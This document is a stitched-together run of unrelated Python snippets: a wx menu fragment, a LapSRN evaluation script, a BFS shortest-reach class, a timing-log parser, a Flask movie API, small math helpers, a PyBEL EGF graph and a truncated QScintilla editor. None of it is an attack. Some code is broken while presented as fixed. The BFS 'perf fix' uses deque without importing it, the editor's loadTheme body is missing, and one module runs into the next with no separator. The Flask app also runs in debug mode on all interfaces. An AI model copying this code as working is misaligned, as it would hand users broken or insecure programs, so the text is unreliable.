        # both actions below prompt for a source plot via other_plots_dialog()
        item4 = area_popup.Append(wx.ID_ANY, "copy intens. scale from", '')
        wx.EVT_MENU(self, item4.GetId(), lambda evt: self.copy_intensity_range_from(self.other_plots_dialog()) )
        item5 = area_popup.Append(wx.ID_ANY, "copy slice region from", '')
        wx.EVT_MENU(self, item5.GetId(), lambda evt: self.sliceplot(self.other_plots_dialog().slice_xy_range) )
        self.PopupMenu(area_popup, evt.GetPositionTuple())
|
import torch
from torch.autograd import Variable
import numpy as np
import time, math, glob
import scipy.io as sio
import matplotlib.pyplot as plt
from ssim import ssim
from lapsrn import LapSrnMS
def PSNR(pred, gt, shave_border=0):
    """Peak signal-to-noise ratio (dB) between *pred* and *gt*, assuming a
    255 peak value.  A border of width *shave_border* is excluded on every
    side; identical inputs return 100."""
    h, w = pred.shape[:2]
    region = (slice(shave_border, h - shave_border),
              slice(shave_border, w - shave_border))
    diff = pred[region] - gt[region]
    rmse = math.sqrt(np.mean(diff ** 2))
    if rmse == 0:
        return 100
    return 20 * math.log10(255.0 / rmse)
def SSIM(pred, gt, shave_border=0):
    """Mean structural similarity over the border-cropped images
    (delegates to the project's ssim implementation)."""
    h, w = pred.shape[:2]
    region = (slice(shave_border, h - shave_border),
              slice(shave_border, w - shave_border))
    return np.mean(ssim(pred[region], gt[region]))
if __name__ == '__main__':
    # Evaluate a trained LapSRN model (PSNR/SSIM vs bicubic baseline) on
    # every dataset under dataset/mat/ at scales 2 and 4.
    cuda = True  # NOTE(review): device 'cuda:2' is hard-coded below -- confirm
    checkpoint = torch.load('best.pt')
    model = LapSrnMS(5, 5, 4)
    model.load_state_dict(checkpoint['state_dict'])
    model = model.to('cuda:2')
    model.eval()
    for scale in [2, 4]:
        for dataset in glob.glob('dataset/mat/*/'):
            image_list = glob.glob('{}{}x/*.mat'.format(dataset, scale))
            # bug fix: a dataset with no images at this scale made the
            # per-image averages below divide by zero
            if not image_list:
                continue
            avg_psnr_predicted = 0.0
            avg_psnr_bicubic = 0.0
            avg_ssim_predicted = 0.0
            avg_ssim_bicubic = 0.0
            avg_elapsed_time = 0.0
            for image_name in image_list:
                # each .mat holds ground-truth, bicubic, low-res Y channels
                # plus the low-res RGB image
                mat = sio.loadmat(image_name)
                im_gt_y = mat['im_gt_y'].astype(float)
                im_b_y = mat['im_b_y'].astype(float)
                im_l_y = mat['im_l_y'].astype(float)
                im_rgb = mat['im_rgb'].astype(float)
                # bicubic baseline metrics
                psnr_bicubic = PSNR(im_gt_y, im_b_y, shave_border=scale)
                avg_psnr_bicubic += psnr_bicubic
                avg_ssim_bicubic += SSIM(im_gt_y, im_b_y, shave_border=scale)
                # normalize to [0,1] and add batch/channel dims
                im_input = im_l_y / 255.
                im_rgb = im_rgb / 255.
                im_input = Variable(torch.from_numpy(im_input).float()).view(1, -1, im_input.shape[0], im_input.shape[1])
                im_rgb = Variable(torch.from_numpy(im_rgb).float()).reshape(1, -1, im_rgb.shape[0], im_rgb.shape[1])
                if cuda:
                    im_input = im_input.to('cuda:2')
                    im_rgb = im_rgb.to('cuda:2')
                else:
                    model = model.cpu()
                start_time = time.time()
                # the model returns (2x, 4x) outputs; pick the requested scale
                if scale == 2:
                    HR_4x, _ = model(im_rgb, im_input)
                if scale == 4:
                    _, HR_4x = model(im_rgb, im_input)
                elapsed_time = time.time() - start_time
                avg_elapsed_time += elapsed_time
                HR_4x = HR_4x.cpu()
                # back to 8-bit range, clamped
                im_h_y = HR_4x.data[0].numpy().astype(np.float32)
                im_h_y = im_h_y * 255.
                im_h_y[im_h_y < 0] = 0
                im_h_y[im_h_y > 255.] = 255.
                im_h_y = im_h_y[0, :, :]
                psnr_predicted = PSNR(im_gt_y, im_h_y, shave_border=scale)
                avg_psnr_predicted += psnr_predicted
                avg_ssim_predicted += SSIM(im_gt_y, im_h_y, shave_border=scale)
            print("Scale=", scale)
            print("Dataset=", dataset)
            print("PSNR_predicted=", avg_psnr_predicted / len(image_list))
            print("PSNR_bicubic=", avg_psnr_bicubic / len(image_list))
            print("SSIM_predicted=", avg_ssim_predicted / len(image_list))
            print("SSIM_bicubic=", avg_ssim_bicubic / len(image_list))
            print("It takes average {}s for processing".format(avg_elapsed_time / len(image_list)))
|
#!/usr/bin/python3
import queue
from collections import defaultdict
class Graph():
    """Undirected, unweighted graph with BFS distance queries.

    Every edge counts as distance 6 (the HackerRank "BFS: Shortest Reach"
    convention).
    """
    def __init__(self, n):
        # n: number of nodes, labelled 0 .. n-1
        self.n = n
        self.edges = defaultdict(list)
    def connect(self, x, y):
        """Add an undirected edge between nodes x and y."""
        self.edges[x].append(y)
        self.edges[y].append(x)
    def find_all_distances(self, s):
        """Print BFS distances (6 per hop) from *s* to every other node.

        Unreachable nodes print -1; the source itself is omitted.
        """
        result = [-1] * self.n
        visited = [False] * self.n
        # perf fix: the original emulated a FIFO queue with a list,
        # paying O(n) per enqueue via "q = [neighbor] + q"; deque gives
        # O(1) appends and pops while visiting nodes in the same order.
        q = deque([s])
        visited[s] = True
        result[s] = 0
        while q:
            current = q.popleft()
            height = result[current]
            for neighbor in self.edges[current]:
                if not visited[neighbor]:
                    result[neighbor] = height + 6
                    q.append(neighbor)
                    visited[neighbor] = True
        result.pop(s)
        print(" ".join(map(str, result)))
|
# Parse a per-layer timing log (path given as argv[1]) and emit one CSV-ish
# line per layer: layer, in_size, out_size, comp_time, cum_comp_time,
# trans_time, thresh, cum_thresh, is_check.
from sys import argv
fname = argv[1]
with open(fname) as f:
    lines = f.readlines()
# running state for the layer currently being accumulated
layer = -1
comp_time = 0
cum_comp_time = 0
in_size = 0
out_size = 0
trans_time = 0
thresh = 0
cum_thresh = 0
is_check = False
for line in lines:
    if line.startswith("Layer Number"):
        num = int(line.split(":")[1].strip())
        if num == layer:
            # repeated header for the same layer: ignore
            continue
        else:
            if layer != -1:
                # Print previous layer
                print("{}, {}, {}, {}, {}, {}, {}, {}, {}".format(layer, in_size, out_size, comp_time, cum_comp_time, trans_time, thresh, cum_thresh, is_check))
            layer = num
            is_check = False
    # the "cumulative" test must come before the plain "compute" prefix,
    # since both start with "Time Taken compute"
    elif line.startswith("Time Taken compute cumulative"):
        num = float(line.split("=")[1].strip())
        cum_comp_time = num
    elif line.startswith("Time Taken compute"):
        num = float(line.split("=")[1].strip())
        comp_time = num
    elif line.startswith("Input Size"):
        num = int(line.split(":")[1].strip())
        in_size = num
    # NOTE(review): "Ouput" presumably matches the producer's misspelling
    # in the log format -- confirm before "fixing".
    elif line.startswith("Ouput Size"):
        num = int(line.split(":")[1].strip())
        out_size = num
    elif line.startswith("Time Taken transfer"):
        num = float(line.split("=")[1].strip())
        trans_time = num
    elif line.startswith("Thresh"):
        num = float(line.split("=")[1].strip())
        thresh = num
    elif line.startswith("Cumulative Thresh"):
        num = float(line.split("=")[1].strip())
        cum_thresh = num
    elif line.startswith("CHECKPOINT"):
        is_check = True
# Print previous layer
print("{}, {}, {}, {}, {}, {}, {}, {}, {}".format(layer, in_size, out_size, comp_time, cum_comp_time, trans_time, thresh, cum_thresh, is_check))
|
from flask import Flask
from redis import Redis
from flask import jsonify
from flask import request
import requests
import json
import re
import copy
app = Flask(__name__)
movies = [ {
'ID' : '0',
'Title' : 'Avengers: Infinity War',
'Release_date' : '05-2018',
'Rating' : '5.3',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '1',
'Title' : 'Avengers: Infinity War',
'Release_date' : '05-2018',
'Rating' : 'Not Rated',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '2',
'Title' : 'Movie_1',
'Release_date' : '05-2018',
'Rating' : '8.0',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '3',
'Title' : 'Movie_2',
'Release_date' : '05-2018',
'Rating' : '3.75',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '4',
'Title' : 'Movie_3',
'Release_date' : '05-2018',
'Rating' : 'Not Rated',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '5',
'Title' : 'Avengers: Infinity War',
'Release_date' : '05-2018',
'Rating' : 'Not Rated',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '6',
'Title' : 'Alpha',
'Release_date' : '09-2018',
'Rating' : 'Not Rated',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '7',
'Title' : 'Fantastic Beasts: Crimes of Grundelvald',
'Release_date' : '11-2018',
'Rating' : 'Not Rated',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '8',
'Title' : 'Insidious: the last key',
'Release_date' : '01-2018',
'Rating' : 'Not Rated',
'Genre' : 'Horror',
'Album_ID' : '1'
}]
@app.route('/movies', methods=['GET'])
def hello():
    """List movies.  Optional query params (checked in this order):
    embedded=album inlines each movie's album; title= regex-searches
    titles; genre= matches exactly; rating= returns movies rated strictly
    above the given 0-10 value."""
    if( request.args.get('embedded', '') == "album"):
        moviesEmb = copy.deepcopy(movies)
        for movie in moviesEmb:
            try:
                r = requests.get('http://web1:81/albums/' + movie['Album_ID'])
                movie['Album'] = json.loads(r.text)[0]
            except Exception:
                # album service unreachable or bad payload: keep placeholder
                # (narrowed from a bare 'except:', which also swallowed
                # KeyboardInterrupt/SystemExit)
                movie['Album'] = "null"
        return jsonify(moviesEmb), 200
    elif( request.args.get('title', '')):
        pattern = request.args.get('title', '')
        foundMovies = [m for m in movies
                       if re.search(pattern, m["Title"], re.IGNORECASE)]
        return jsonify(foundMovies), 200
    elif( request.args.get('genre', '')):
        foundMovies = [ movie for movie in movies if (movie['Genre'] == request.args.get('genre', ''))]
        return jsonify(foundMovies), 200
    elif( request.args.get('rating', '')):
        # bug fix: the old pattern ^[0-9](\.[0-9]*)?$ rejected "10" even
        # though the error message promises a 0-10 range
        rating_re = re.compile(r'^(10(\.0*)?|[0-9](\.[0-9]*)?)$')
        threshold = request.args.get('rating', '')
        if rating_re.match(threshold):
            foundMovies = [movie for movie in movies
                           if rating_re.match(movie['Rating'])
                           and float(movie['Rating']) > float(threshold)]
            return jsonify(foundMovies), 200
        else:
            return jsonify({'Error':'Rating has to be between 0-10'}), 404
    else:
        return jsonify(movies), 200
@app.route('/movies/<movieID>', methods=['GET'])
def getMovieByID(movieID):
    # Return one movie; with ?embedded=album the album record is fetched
    # from the albums service and embedded into the response.
    if( request.args.get('embedded', '') == "album"):
        # NOTE(review): this branch treats movieID as a *list index*
        # (movies[int(movieID)]) while the plain branch matches the 'ID'
        # field -- the two disagree once IDs and positions diverge (e.g.
        # after a DELETE); confirm which lookup is intended.
        moviesEmb=copy.deepcopy(movies)
        r = requests.get('http://web1:81/albums/'+moviesEmb[int(movieID)]['Album_ID'])
        r = json.loads(r.text)
        moviesEmb[int(movieID)]['Album'] = r[0]
        return jsonify(moviesEmb[int(movieID)]), 200
    else:
        # Lookup by the movie's 'ID' field (string comparison); an unknown
        # ID yields an empty JSON list, not a 404.
        movieByID = [ movie for movie in movies if ( movie['ID'] == movieID)]
        return jsonify(movieByID), 200
@app.route('/movies', methods=['POST'])
def newMovie():
    # Create a movie from the JSON payload. Two payload shapes are accepted:
    #  * with an embedded 'Album' object: the album is first created in the
    #    albums service and the returned album ID is linked to the movie;
    #  * with an 'Album_ID': the album must already exist (a 404 from the
    #    albums service is reported back to the caller).
    if('Album' in request.json):
        album = request.json['Album']
        r = requests.post('http://web1:81/albums', json = {"Album" : album['Album'], "Artist" : album['Artist'], "Genre" : album['Genre'], "Producer" : album['Producer']})
        r = json.loads(r.text)
        # NOTE(review): the new ID is derived from len(movies); after a
        # DELETE this can collide with an existing movie ID -- confirm.
        numberOfMovies = len(movies)
        new_Movie={
            'ID' : str(numberOfMovies),
            'Title' : request.json['Title'],
            'Release_date' : request.json['Release_date'],
            'Rating' : request.json['Rating'],
            'Genre' : request.json['Genre'],
            'Album_ID' : r['ID']
        }
        movies.append(new_Movie)
        return jsonify(new_Movie), 201
    else:
        numberOfMovies = len(movies)
        # Validate that the referenced album exists before creating the movie.
        r = requests.get('http://web1:81/albums/'+request.json['Album_ID'])
        if r.status_code == 404:
            return jsonify({'Error' : 'Album not found.'}), 404
        else:
            new_Movie={
                'ID' : str(numberOfMovies),
                'Title' : request.json['Title'],
                'Release_date' : request.json['Release_date'],
                'Rating' : request.json['Rating'],
                'Genre' : request.json['Genre'],
                'Album_ID' : request.json['Album_ID']
            }
            movies.append(new_Movie)
            return jsonify(new_Movie), 201
@app.route('/movies/<movieId>', methods=['PATCH'])
def rateMovie( movieId ):
    """Partially update the movie at list position int(movieId).

    * payload with 'Album': forward the album fields to the albums service
      (PUT) and return the updated album record.
    * payload with 'Album_ID': re-link the movie to an existing album
      (404 if the albums service does not know the ID).
    * otherwise: apply the payload's 'Rating' -- the first rating replaces
      "Not Rated", subsequent ratings are averaged with the current one.
    """
    if( 'Album' in request.json ):
        r = requests.put('http://web1:81/albums/'+movies[int(movieId)]["Album_ID"], json = {"Album" : request.json['Album']['Album'], "Artist" : request.json['Album']['Artist'], "Genre" : request.json['Album']['Genre of Album'], "Producer" : request.json['Album']['Producer']})
        r = json.loads(r.text)[0]
        return jsonify(r), 200
    elif('Album_ID' in request.json):
        r = requests.get('http://web1:81/albums/'+request.json['Album_ID'])
        if r.status_code == 404:
            return jsonify({'Error' : 'Album not found.'}), 404
        else:
            movies[int(movieId)]["Album_ID"] = request.json['Album_ID']
            return jsonify(movies[int(movieId)]), 200
    else:
        setRating = request.json['Rating']
        # BUG FIX: the old check was ``setRating == 10`` -- a JSON *string*
        # compared against the int 10 is always False, and the regex only
        # matches single digits, so the maximum rating "10" was rejected
        # despite the documented 0-10 range. Normalising through str() also
        # avoids a TypeError when the client sends a JSON number.
        if str(setRating) == "10" or re.search(r'^[0-9](\.[0-9]*)?$', str(setRating)):
            if (movies[int(movieId)]["Rating"] == "Not Rated"):
                # First rating simply replaces the placeholder.
                movies[int(movieId)]["Rating"] = setRating
            else:
                # Later ratings are averaged with the stored value.
                rating = movies[int(movieId)]["Rating"]
                movies[int(movieId)]["Rating"] = (float(0 if rating == "Not Rated" else rating) + (0 if setRating == "Not Rated" else float(setRating))) / 2
            return jsonify(movies[int(movieId)]), 200
        else:
            return jsonify({'Error':'Rating has to be between 0-10'}), 404
#curl -i -X PUT -H "Content-Type: application/json" -d '{"Title": "Venom", "Release_date": "2018", "Rating": "Not Rated", "Genre": "Horror", "Album_ID": "2"}' localhost/movies/2
#curl -i -X PUT -H "Content-Type: application/json" -d '{"Title": "Venom", "Release_date": "2018", "Rating": "Not Rated", "Genre": "Horror", "Album": {"Album" : "1", "Artist" : "Mikutavicius", "Genre of Album" : "yra", "Producer" : "Mikutavicius"}}' localhost/movies/2
@app.route('/movies/<movieId>', methods=['PUT'])
def changeMovie( movieId ):
    # Replace all fields of the movie at list position int(movieId).
    # With an embedded 'Album' object the linked album is also rewritten in
    # the albums service; with an 'Album_ID' the album must already exist.
    if('Album' in request.json):
        movies[int(movieId)]['Title'] = request.json['Title']
        movies[int(movieId)]['Genre'] = request.json['Genre']
        movies[int(movieId)]['Rating'] = request.json['Rating']
        movies[int(movieId)]['Release_date'] = request.json['Release_date']
        # Push the new album fields to the albums service and embed its reply.
        r = requests.put('http://web1:81/albums/'+movies[int(movieId)]["Album_ID"], json = {"Album" : request.json['Album']['Album'], "Artist" : request.json['Album']['Artist'], "Genre" : request.json['Album']['Genre of Album'], "Producer" : request.json['Album']['Producer']})
        movies[int(movieId)]['Album'] = json.loads(r.text)[0]
        return jsonify(movies[int(movieId)]), 200
    else:
        # Validate the referenced album before overwriting the movie.
        r = requests.get('http://web1:81/albums/'+request.json['Album_ID'])
        if r.status_code == 404:
            return jsonify({'Error' : 'Album not found.'}), 404
        else:
            movies[int(movieId)]['Title'] = request.json['Title']
            movies[int(movieId)]['Genre'] = request.json['Genre']
            movies[int(movieId)]['Rating'] = request.json['Rating']
            movies[int(movieId)]['Release_date'] = request.json['Release_date']
            movies[int(movieId)]['Album_ID'] = request.json['Album_ID']
            return jsonify(movies[int(movieId)]), 200
#Deletes movie by ID curl -i -X DELETE localhost/movies/3
@app.route('/movies/<movieId>', methods=['DELETE'])
def removeMovie( movieId ):
    # Find the movie whose 'ID' field matches; None when absent.
    target = next((movie for movie in movies if movie['ID'] == movieId), None)
    if target is None:
        return jsonify({'Delete failed' : 'ID not found.'}), 404
    movies.remove(target)
    return jsonify(target), 200
if __name__ == "__main__":
    # Listen on all interfaces; debug mode enables the reloader/debugger
    # (not suitable for production deployments).
    app.run(host="0.0.0.0", debug=True, port=5000)
|
def Multi( arg1=0, arg2=0 , *vartuple ):
    """Return the product of all positional arguments (defaults are 0)."""
    result = arg1 * arg2
    for factor in vartuple:
        result *= factor
    return result
def Fib(n):
    """Return the list of Fibonacci numbers strictly less than n."""
    fibs = []
    prev, curr = 0, 1
    while curr < n:
        fibs.append(curr)
        prev, curr = curr, prev + curr
    return fibs
def SumLis(list):
    """Return the sum of the elements of *list*.

    Note: the parameter name shadows the built-in ``list``; it is kept so
    callers using the keyword form keep working.
    """
    # Delegate to the C-implemented builtin instead of a manual loop (the
    # original also shadowed the builtin ``sum`` with a local variable).
    return sum(list)
if __name__ == "__main__":
    # Smoke message printed when the module is executed as a script.
    print("Módulo new_func como script")
# -*- coding: utf-8 -*-
"""An example describing EGF's effect on cellular processes.
.. code-block:: none
SET Citation = {"PubMed","Clin Cancer Res 2003 Jul 9(7) 2416-25","12855613"}
SET Evidence = "This induction was not seen either when LNCaP cells were treated with flutamide or conditioned medium were pretreated with antibody to the epidermal growth factor (EGF)"
SET Species = 9606
tscript(p(HGNC:AR)) increases p(HGNC:EGF)
UNSET ALL
SET Citation = {"PubMed","Int J Cancer 1998 Jul 3 77(1) 138-45","9639405"}
SET Evidence = "DU-145 cells treated with 5000 U/ml of IFNgamma and IFN alpha, both reduced EGF production with IFN gamma reduction more significant."
SET Species = 9606
p(HGNC:IFNA1) decreases p(HGNC:EGF)
p(HGNC:IFNG) decreases p(HGNC:EGF)
UNSET ALL
SET Citation = {"PubMed","DNA Cell Biol 2000 May 19(5) 253-63","10855792"}
SET Evidence = "Although found predominantly in the cytoplasm and, less abundantly, in the nucleus, VCP can be translocated from the nucleus after stimulation with epidermal growth factor."
SET Species = 9606
p(HGNC:EGF) increases tloc(p(HGNC:VCP), GO:nucleus, GO:cytoplasm)
UNSET ALL
SET Citation = {"PubMed","J Clin Oncol 2003 Feb 1 21(3) 447-52","12560433"}
SET Evidence = "Valosin-containing protein (VCP; also known as p97) has been shown to be associated with antiapoptotic function and metastasis via activation of the nuclear factor-kappaB signaling pathway."
SET Species = 9606
cat(p(HGNC:VCP)) increases tscript(complex(p(HGNC:NFKB1), p(HGNC:NFKB2), p(HGNC:REL), p(HGNC:RELA), p(HGNC:RELB)))
tscript(complex(p(HGNC:NFKB1), p(HGNC:NFKB2), p(HGNC:REL), p(HGNC:RELA), p(HGNC:RELB))) decreases bp(MESHPP:Apoptosis)
UNSET ALL
"""
from ..dsl import BiologicalProcess, ComplexAbundance, Protein, activity, translocation
from ..language import cytoplasm, nucleus
from ..resources import CHEBI_URL, CONFIDENCE_URL, GO_URL, HGNC_URL, SPECIES_PATTERN
from ..struct.graph import BELGraph
__all__ = [
    "egf_graph",
]

# BEL graph encoding the EGF statements quoted in the module docstring.
egf_graph = BELGraph(
    name="EGF Pathway",
    version="1.0.0",
    description="The downstream effects of EGF",
    authors="Charles Tapley Hoyt",
    contact="cthoyt@gmail.com",
)
# Register the namespaces (hgnc/chebi/go) and annotations used below.
egf_graph.namespace_url.update(
    {
        "hgnc": HGNC_URL,
        "chebi": CHEBI_URL,
        "go": GO_URL,
    }
)
egf_graph.annotation_url.update(
    {
        "Confidence": CONFIDENCE_URL,
    }
)
egf_graph.annotation_pattern.update(
    {
        "Species": SPECIES_PATTERN,
    }
)

# Protein nodes referenced by the edges.
ar = Protein(name="AR", namespace="hgnc")
egf = Protein(name="EGF", namespace="hgnc")
ifna1 = Protein(name="IFNA1", namespace="hgnc")
ifng = Protein(name="IFNG", namespace="hgnc")
vcp = Protein(name="VCP", namespace="hgnc")
nfkb1 = Protein(name="NFKB1", namespace="hgnc")
nfkb2 = Protein(name="NFKB2", namespace="hgnc")
rel = Protein(name="REL", namespace="hgnc")
rela = Protein(name="RELA", namespace="hgnc")
relb = Protein(name="RELB", namespace="hgnc")
# The NF-kB transcription-factor complex and the apoptosis process node.
nfkb_complex = ComplexAbundance([nfkb1, nfkb2, rel, rela, relb])
apoptosis = BiologicalProcess(namespace="go", name="apoptotic process", identifier="0006915")

# AR (transcriptional activity) increases EGF (PMID 12855613).
egf_graph.add_increases(
    ar,
    egf,
    citation="12855613",
    evidence="This induction was not seen either when LNCaP cells were treated with flutamide or conditioned medium "
    "were pretreated with antibody to the epidermal growth factor (EGF)",
    annotations={"Species": "9606"},
    source_modifier=activity("tscript"),
)
# IFNA1 and IFNG each decrease EGF (PMID 9639405).
egf_graph.add_decreases(
    ifna1,
    egf,
    citation="9639405",
    evidence="DU-145 cells treated with 5000 U/ml of IFNgamma and IFN alpha, both reduced EGF production with IFN "
    "gamma reduction more significant.",
    annotations={"Species": "9606"},
)
egf_graph.add_decreases(
    ifng,
    egf,
    citation="9639405",
    evidence="DU-145 cells treated with 5000 U/ml of IFNgamma and IFN alpha, both reduced EGF production with IFN "
    "gamma reduction more significant.",
    annotations={"Species": "9606"},
)
# EGF increases the nucleus->cytoplasm translocation of VCP (PMID 10855792).
egf_graph.add_increases(
    egf,
    vcp,
    citation="10855792",
    evidence="Although found predominantly in the cytoplasm and, less abundantly, in the nucleus, VCP can be "
    "translocated from the nucleus after stimulation with epidermal growth factor.",
    annotations={"Species": "9606"},
    target_modifier=translocation(
        from_loc=nucleus,
        to_loc=cytoplasm,
    ),
)
# VCP (catalytic) activates NF-kB transcription; NF-kB transcription
# decreases apoptosis (both PMID 12560433).
egf_graph.add_increases(
    vcp,
    nfkb_complex,
    citation="12560433",
    evidence="Valosin-containing protein (VCP; also known as p97) has been shown to be associated with antiapoptotic"
    " function and metastasis via activation of the nuclear factor-kappaB signaling pathway.",
    annotations={"Species": "9606"},
    source_modifier=activity("cat"),
    target_modifier=activity("tscript"),
)
egf_graph.add_decreases(
    nfkb_complex,
    apoptosis,
    citation="12560433",
    evidence="Valosin-containing protein (VCP; also known as p97) has been shown to be associated with antiapoptotic "
    "function and metastasis via activation of the nuclear factor-kappaB signaling pathway.",
    annotations={"Species": "9606"},
    source_modifier=activity("tscript"),
)
|
import sys
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.Qsci import *
import json
import re
import platform
# Maps a file extension to the QScintilla lexer class used to highlight it;
# keys must match the extension captured in setLexerFromFileExtension.
lexers = {
    "py": QsciLexerPython,
    "css": QsciLexerCSS,
    "cs": QsciLexerCSharp,
    "coffee": QsciLexerCoffeeScript,
    "json": QsciLexerJSON,
    "html": QsciLexerHTML,
    "yml": QsciLexerYAML,
    "md": QsciLexerMarkdown,
}
class CustomMainWindow(QMainWindow):
    """Main window of the "Chai" editor: a QScintilla widget configured from
    config.json, themed from themes/<name>.json, with a File/View menubar."""

    def __init__(self):
        super(CustomMainWindow, self).__init__()
        self.setWindowTitle("Chai")
        # load the json config
        with open("config.json", "r") as f:
            self.jsonConfig = f.read()
        self.loadTheme("minute")
        self.Config = json.loads(self.jsonConfig)
        with open("main.css", "r") as f:
            self.__styles = f.read()
        print(self.Config)
        # make frame (holds the editor and carries the main.css styling)
        self.__frm = QFrame(self)
        self.__openFilePath = ""
        self.__lyt = QVBoxLayout()
        self.__frm.setStyleSheet(self.__styles)
        self.__frm.setLayout(self.__lyt)
        self.setCentralWidget(self.__frm)
        # Font and colors come straight from config.json.
        self.__myFont = QFont(self.Config['fontFamily'])
        print("set font to " + self.Config['fontFamily'])
        self.__myFont.setPointSize(self.Config['fontSize'])
        self.__bgcolor = QColor(self.Config["backgroundColor"])
        self.__bglight = QColor(self.Config['backgroundLight'])
        self.__fgcolor = QColor(self.Config['foregroundColor'])
        self.__fglight = QColor(self.Config['foregroundLight'])
        # QScintilla editor setup
        # ------------------------
        # ! Make instance of QsciScintilla class!
        self.__editor = QsciScintilla()
        self.__editor.setText("")
        self.__editor.setLexer(None)
        self.__editor.setUtf8(self.Config['utf8']) # Set encoding to UTF-8
        self.__editor.setFont(self.__myFont)  # Will be overridden by lexer!
        # Wrap mode is configurable: word / none / character / whitespace.
        if self.Config['wrapMode'] == "word":
            self.__editor.setWrapMode(QsciScintilla.WrapWord)
        elif self.Config['wrapMode'] == "none":
            self.__editor.setWrapMode(QsciScintilla.WrapNone)
        elif self.Config['wrapMode'] == "character":
            self.__editor.setWrapMode(QsciScintilla.WrapCharacter)
        else:
            self.__editor.setWrapMode(QsciScintilla.WrapWhitespace)
        self.__editor.setWrapVisualFlags(QsciScintilla.WrapFlagNone, QsciScintilla.WrapFlagInMargin, QsciScintilla.WrapIndentSame)
        # Indentation / guides / caret styling from the configured colors.
        self.__editor.setIndentationsUseTabs(True)
        self.__editor.setTabWidth(self.Config["tabSize"])
        self.__editor.setIndentationGuides(self.Config["indentationGuides"])
        self.__editor.setIndentationGuidesForegroundColor(self.__fglight)
        self.__editor.setIndentationGuidesBackgroundColor(self.__fglight)
        self.__editor.setAutoIndent(True)
        self.__editor.setPaper(self.__bgcolor)
        self.__editor.setColor(self.__fgcolor)
        self.__editor.setCaretForegroundColor(self.__fglight)
        self.__editor.setCaretLineBackgroundColor(self.__bglight)
        self.__editor.setCaretLineVisible(True)
        self.__editor.setCaretWidth(3)
        # Margin Stuff (margin 1 is the line-number margin)
        self.__editor.setMarginType(1, QsciScintilla.NumberMargin)
        # TODO: set dynamic calculation of margin width
        contentLength = len(str(self.__editor.text()))
        self.__editor.setMarginWidth(1, "00000")
        self.__editor.setMarginsBackgroundColor(self.__bgcolor)
        self.__editor.setMarginsForegroundColor(self.__fglight)
        # EOL
        self.__editor.setEolMode(QsciScintilla.EolUnix)
        # Lexer Implementation:
        # move the editor!
        self.__editor.setStyleSheet("border: 0px; margin: 15px;")
        # ! Add editor to layout !
        self.__lyt.addWidget(self.__editor)
        # initialize menubar: Open / Save / Toggle Line Nums actions
        menubar = self.menuBar()
        openAction = QAction('&Open', self)
        openAction.setStatusTip('Open File')
        openAction.triggered.connect(self.openDialog)
        saveAction = QAction('&Save', self)
        saveAction.setStatusTip('Save File')
        saveAction.triggered.connect(self.saveFile)
        toggleLineNumAction = QAction('&Toggle Line Nums', self)
        toggleLineNumAction.setStatusTip('Toggle Line Numbers')
        toggleLineNumAction.triggered.connect(self.toggleLines)
        fileMenu = menubar.addMenu('&File')
        viewMenu = menubar.addMenu('&View')
        # Platform-specific shortcuts: Ctrl elsewhere, Cmd on macOS; the
        # menubar is only restyled off-macOS (macOS uses the native bar).
        if platform.system() != "Darwin":
            openAction.setShortcut('Ctrl+O')
            saveAction.setShortcut('Ctrl+S')
            menubar.setStyleSheet("background-color: " + self.Config['backgroundColor'] + "; color: " + self.Config['foregroundLight'])
        else:
            openAction.setShortcut('Cmd+O')
            saveAction.setShortcut('Cmd+S')
        fileMenu.addAction(openAction)
        fileMenu.addAction(saveAction)
        viewMenu.addAction(toggleLineNumAction)
        self.show()

    def toggleLines(self):
        """Show/hide the line-number margin by toggling its width."""
        if self.__editor.marginWidth(1) > 0:
            self.__editor.setMarginWidth(1, 0)
        else:
            self.__editor.setMarginWidth(1, "0000")

    def openFile(self, path):
        """Load *path* into the editor and pick a lexer from its extension."""
        # get content of file
        with open(path, "r") as f:
            self.fileContent = f.read()
        self.__editor.setText(self.fileContent)
        self.setLexerFromFileExtension(path)
        self.__openFilePath = path

    def openDialog(self):
        """Show a non-native open dialog and open the chosen file."""
        options = QFileDialog.Options()
        options |= QFileDialog.DontUseNativeDialog
        fileName, _ = QFileDialog.getOpenFileName(self,"QFileDialog.getOpenFileName()", "","All Files (*);;Python Files (*.py)", options=options)
        if fileName:
            print("opening",fileName)
            self.openFile(fileName)

    def saveFile(self):
        """Write the buffer to the current path, or ask for one first."""
        if self.__openFilePath != "":
            dtext = self.__editor.text()
            print(dtext)
            with open(self.__openFilePath, "w+") as f:
                f.write(dtext)
        else:
            self.saveDialog()

    def saveDialog(self):
        """Show a non-native save dialog, remember the path, then save."""
        options = QFileDialog.Options()
        options |= QFileDialog.DontUseNativeDialog
        fileName, _ = QFileDialog.getSaveFileName(self,"QFileDialog.getSaveFileName()", "","All Files (*);;Python Files (*.py)", options=options)
        if fileName:
            print("\""+fileName+"\"")
            self.__openFilePath = fileName
            self.saveFile()

    def setLexerFromFileExtension(self, path):
        """Pick the lexer for *path*'s extension and apply theme colors.

        NOTE(review): extensions missing from ``lexers`` or from the loaded
        theme raise KeyError here -- confirm whether a fallback is wanted.
        """
        regex = r".+\.(\w+)"
        result = re.search(regex, path)
        print(result[1])
        l = result[1]
        lexer = lexers[l]()
        languageTheme = self.__theme[l]
        """
        for index, value in lexers.items():
            print(index)
            for n in list(range(30)):
                print(lexers[index]().description(n))
            print("\n\n")
        """
        #self.__editor.Styles[lexer.commentLine.size] = 18
        lexer.setDefaultFont(self.__myFont)
        lexer.setDefaultPaper(self.__bgcolor)
        lexer.setDefaultColor(self.__fgcolor)
        print(languageTheme)
        # Theme entries map a lexer style-attribute name to a color string.
        for name, value in languageTheme.items():
            print(value, name)
            lexer.setColor(QColor(value), getattr(lexers[l](), name))
            lexer.setPaper(self.__bgcolor, getattr(lexers[l](), name))
            lexer.setFont(self.__myFont, getattr(lexers[l](), name))
        self.__editor.setLexer(lexer)

    def loadTheme(self, themename):
        """Load themes/<themename>.json into self.__theme."""
